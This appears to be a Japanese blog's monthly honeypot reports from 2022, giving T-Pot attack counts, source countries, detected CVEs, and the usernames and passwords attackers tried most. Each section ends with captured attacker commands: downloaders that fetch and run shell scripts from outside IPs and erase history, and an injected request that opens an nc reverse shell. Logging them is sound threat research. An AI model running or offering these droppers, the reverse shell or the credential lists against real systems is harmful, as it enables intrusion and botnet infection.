16	Dicompot	81	▲75

Result
- Ddospotへのアクセス数が増加していた。

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Brazil	673,263	↑(8)
2	United States	398,933	→(2)
3	China	386,464	→(3)
4	Netherlands	317,730	↓(1)
5	Russia	163,777	↓(4)
6	Japan	129,188	↓(5)
7	Ireland	91,700	↑(圏外)
8	India	63,168	↑(10)
9	Vietnam	62,249	↑(14)
10	United Kingdom	55,822	↑(16)
11	Germany	51,174	↓(6)
12	Singapore	47,327	↓(11)
13	South Korea	38,781	↓(12)
14	Bangladesh	32,478	↑(圏外)
15	Indonesia	29,213	↑(19)
16	Sweden	26,230	↑(20)
17	France	25,208	↓(13)
18	Hong Kong	24,849	→(18)
19	Panama	21,789	↑(圏外)
20	Costa Rica	20,997	↑(圏外)

Result
- 集計期間が少ないこともあるがブラジルからのアクセス数が一時的に増加し、ニュージーランドおよび中国からのアクセスが減少した。

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	162,184
2	CVE-2020-11910	3,393
3	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255	45
4	CVE-1999-0016	1

Result
- 先月から変更なし

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	71,677
2	sa	10,501
3	admin	7,972
4	nproc	3,682
5	user	2,176
6	(empty)	1,352
7	support	1,222
8	test	1,189
9	22	884
10	postgres	847
11	ubuntu	847
12	oracle	524
13	2Wire	449
14	!root	430
15	git	389
16	ftpuser	358
17	guest	319
18	www	295
19	adm	290
20	user2	263
21	mysql	257
22	666666	239
23	blank	236
24	0	235
25	debug	235
26	jenkins	228
27	unknown	228
28	administrator	227
29	$ALOC$	223
30	ubnt	222
31	deploy	221
32	testuser	215
33	ftp	214
34	anonymous	208
35	minecraft	204
36	Admin	190
37	user1	190
38	db	183
39	web	177
40	wwwroot	172
41	test1	152
42	www-data	141
43	dev	135
44	server	132
45	tomcat	132
46	alex	126
47	nagios	126
48	hadoop	124
49	steam	122
50	ts3	122

Result
- 先月から変更なし

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	123456	4,519
2	admin	4,313
3	nproc	3,682
4	(empty)	2,975
5	123	1,722
6	password	1,529
7	1234	1,435
8	1	1,326
9	12345	1,119
10	suport	727
11	blank	677
12	12345678	667
13	0	491
14	test	396
15	user	376
16	123456789	342
17	666666	318
18	123123	311
19	ubnt	304
20	support	301
21	root	291
22	master	282
23	1234567	268
24	alpine	262
25	P@ssw0rd	260
26	00000000	258
27	111111	247
28	qwerty	247
29	backup	246
30	1qaz2wsx	244
31	hi3518	232
32	unknown	231
33	synnet	227
34	10023	222
35	_Cisco	219
36	!ishtar	212
37	1q2w3e4r	206
38	admin123	204
39	Passw0rd	195
40	test123	192
41	abc123	190
42	passw0rd	190
43	bosco	172
44	Pa$$w0rd	171
45	p@ssw0rd	165
46	123qwe	164
47	1234567890	162
48	12	152
49	P@ssword	151
50	pa55word	147

Result
- 先月から変更なし

⑥今月のmasscanとZmap

masscanの観測結果は以下の通り。

Zmapの観測結果は以下の通り。
Result
- masscanのアクセス数が通常の月と比較して増加傾向にあった。6月30日に複数回のアクセスを確認した。

最後に

情報漏洩事故が起こるとプロジェクト関係者の捜索隊が結成されて、関連先の一斉捜索が行われるのは今でも続いているのだろうか？情報漏洩事故の発生場所が大都市になればなるほど捜索範囲が広くて大変だった記憶がある。昔は新宿のコクーンタワーの真下の草むらに盗まれた財布がよく捨てられていたのだ。
余談ではあるが、今回の情報漏洩事故を聞いて2022年4月1日に日本ユニシス社が社名変更していたのは驚いた。日本有数の大企業であっても常に変革が行われていることを実感するものである。

◆shファイルに関するアクセス

No	アクセス内容	備考
1	/nig.sh	`rm -rf nig.sh; rm -rf miori.*; wget http://2.56.59.225/nig.sh \|\| curl -O http://2.56.59.225/nig.sh \|\| tftp 2.56.59.225 -c get nig.sh \|\| tftp -g -r nig.sh 2.56.59.225; chmod 777 nig.sh;./nig.sh ssh; rm -rf nig.sh`
2	/brokeskid.sh	`cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://62.197.136.157/brokeskid.sh; chmod 777 ; sh brokeskid.sh; tftp -g 62.197.136.157 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c`
3	/epgrec/do-record.sh	EPGrecは録画予約システムのWebアプリケーション
4	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	---

◆exeファイルに関するアクセス

No	アクセス内容	備考
1	/s.exe	---

2022-08-06

ハニーポット運用(月次報告:2022年5月)

Honeypot セキュリティ

今月のTopics

現地時間の5月26日にBroadcom社がVMware社を約 610 億ドルにて買収した。
VMware社自体は1998年に創業後、2004年にEMC社に買収され、2015年にDell社に約670億ドルで買収されている。Dell社は2021年にVMwareを新会社として独立させていることから、紆余曲折があったもののまた買収されるようだ。
VMware社自体は2022年度に赤字経営に傾いており、VMware社側にとってもメリットがある。VMware製品を利用するユーザへの影響は最小限に抑えられることを願う。

参考URL：
https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/company/vmware-broadcom.pdf

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2022年5月1日-2021年5月31日

運用期間：31日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Cowrie	1,596,399	-56,518
2	Ddospot	958,728	727,589
3	Honeytrap	908,394	107,980
4	Heralding	835,748	158,867
5	Dionaea	357,741	14,016
6	Mailoney	16,039	-98,271
7	Adbhoney	14,298	1,686
8	Tanner	6,660	1,560
9	Redishoneypot	4,488	2,941
10	Ciscoasa	2,957	183
11	CitrixHoneypot	2,884	1,097
12	ConPot	2,119	-158
13	Medpot	1,534	577
14	ElasticPot	886	122
15	Ipphoney	211	128
16	Dicompot	156	53

Result
- Ddospot、Honeytrap、Heraldingのアクセス件数が増加していた。

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Netherlands	735,190	1(→)
2	UnitedStates	657,151	4(↑)
3	China	616,852	3(→)
4	Russia	428,832	2(↓)
5	Japan	277,748	10(↑)
6	Germany	182,942	15(↑)
7	Bangladesh	103,276	圏外(↑)
8	Brazil	102,983	13(↑)
9	Palestine	92,606	圏外(↑)
10	India	91,008	9(↓)
11	Singapore	89,891	8(↓)
12	SouthKorea	84,615	14(↑)
13	France	82,374	6(↓)
14	Vietnam	77,827	11(↓)
15	Romania	75,820	圏外(↑)
16	UnitedKingdom	72,204	20(↑)
17	SouthAfrica	70,191	圏外(↑)
18	HongKong	53,616	圏外(↑)
19	Indonesia	47,570	17(↓)
20	Sweden	31,900	19(↓)

Result
- ロシアからのアクセスが減少した一方でアメリカからのアクセスが増えていた。
- 日本からのアクセスも増加傾向にあった。

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	173,085
2	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255	59
3	CVE-2020-11910	28

Result
- 先月から変更なし

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	127,653
2	sa	16,527
3	admin	8,218
4	user	6,096
5	nproc	6,087
6	test	3,515
7		2,212
8	postgres	1,680
9	22	1,307
10	ubuntu	1,293
11	oracle	812
12	ftpuser	687
13	2Wire	665
14	git	655
15	!root	653
16	support	578
17	www	518
18	guest	498
19	web	440
20	mysql	432
21	ftp	406
22	adm	391
23	student	356
24	deploy	354
25	debug	340
26	666666	334
27	minecraft	334
28	testuser	329
29	0	328
30	$ALOC$	325
31	administrator	325
32	blank	321
33	unknown	321
34	user1	309
35	anonymous	293
36	teamspeak	278
37	hadoop	268
38	Admin	266
39	data	258
40	jenkins	257
41	server	256
42	db	246
43	wwwroot	244
44	www-data	242
45	tomcat	231
46	ts3	226
47	nagios	218
48	test1	215
49	dev	186
50	pi	169

Result
- 先月から変更なし

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	nproc	6,087
2	123456	6,086
3		3,819
4	admin	3,324
5	1	2,900
6	password	2,393
7	123	2,191
8	12345	1,437
9	1234	1,412
10	12345678	1,076
11	root	1,046
12	blank	987
13	0	764
14	test	694
15	user	534
16	123123	526
17	qwerty	521
18	666666	505
19	111111	461
20	1q2w3e4r	455
21	123456789	454
22	ubnt	427
23	00000000	418
24	master	417
25	1qaz2wsx	412
26	pass	403
27	alpine	396
28	abc123	389
29	support	384
30	backup	377
31	1234567	364
32	hi3518	340
33	123qwe	335
34	P@ssw0rd	325
35	admin123	308
36	_Cisco	304
37	10023	302
38	synnet	297
39	unknown	297
40	!ishtar	294
41	test123	282
42	1234567890	272
43	p@ssw0rd	259
44	1qaz@WSX	218
45	q1w2e3r4	217
46	123321	216
47	password123	203
48	Passw0rd	190
49	qwe123	190
50	changeme	186

Result
- changeme(50位)はsplunkの管理者ユーザである「splunkadmin」アカウントのパスワードのようだ。利用に際しては注意が必要である。
  jp.tenable.com
- 過去のパスワード関連の記事を見るとパスワード運用の本質は10年以上前から変わっていないことが分かる。 www.itmedia.co.jp

⑥今月のmasscanとZmap

masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

MS-MSDT/Follina(CVE-2022-30190)の脆弱性にてOfficeを開いただけでRCEが発生する事象が発生しているとのこと。
セキュリティの古典である『カッコウはコンピュータに卵を産む』がtwitterで紹介されていたので今度読んでみたいと思う。

◆shファイルに関するアクセス
"cd /tmp ; wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; yum remove wget -y ; yum install wget -y ; apt-get remove wget -y ; apt-get install wget -y ; wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh

wget http://204.15.75.59/jwsn.sh

"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://103.161.17.72/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 103.161.17.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c"

/incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e

"cd /data/local/tmp/; busybox wget http://194.31.98.205/w.sh; sh w.sh; curl http://194.31.98.205/c.sh; sh c.sh",


◆exeファイルに関するアクセス
なし